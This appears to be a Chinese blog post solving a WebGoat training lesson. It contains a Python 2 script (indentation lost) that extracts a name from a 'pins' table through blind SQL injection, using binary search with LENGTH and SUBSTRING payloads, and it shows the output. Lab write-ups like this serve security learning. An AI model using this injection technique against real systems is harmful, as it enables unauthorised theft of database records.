这个 task 如果用手工尝试的话, 还是比较麻烦的. 决定用编程解决.
Python处理任务相关的问题比较方便, 花时间入门了下 python, 然后开始写代码, 很简单的原理.
在这期间发现简单的算法都不熟了, 汗.
以下是代码
#!/usr/bin/python
#author: dengzhaoqun
#date: 2013-03-08
#email: dengzhaoqun@163.com
import urllib
import urllib2
import sys
url= 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
result = '<p>Account number is valid</form></div>'
def isValid(str):
params = urllib.urlencode({'account_number': str, 'SUBMIT':'Go!'})
req = urllib2.Request(url, params, {'Cookie':'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
f = urllib2.urlopen(req)
content = f.read()
ret = content.find(result)
if(ret == -1):
return False
return True
#get name len
lenMax = 100
lenMin = 1
while(lenMax > lenMin):
#print lenMax, lenMin
len = (lenMax + lenMin) / 2
str = "%d and ((LENGTH(select name from pins where cc_number = '4321432143214321')) <= %d)" %(account, len)
#print str
valid = isValid(str)
if( not valid):
lenMin = len + 1
else:
lenMax = len
print "--- name len: %d ---" %lenMax
# get name
name = ''
for i in range(1, lenMax + 1):
charMax = 122 # 'z'
charMin = 65 # 'A'
while(charMax > charMin):
#print chr(charMax), chr(charMin)
char = (charMax + charMin) / 2
str = "%d and ((SUBSTRING((select name from pins where cc_number = '4321432143214321'), %d, 1)) <= '%s')" %(account, i, chr(char))
#print str
valid = isValid(str)
if( not valid):
charMin = char + 1
else:
charMax = char
name += chr(charMax)
print '--- name: %s ---' % name
运行结果如下--- name len: 4 ---
--- name: Jill ---
"Jill" 即是所求的 name .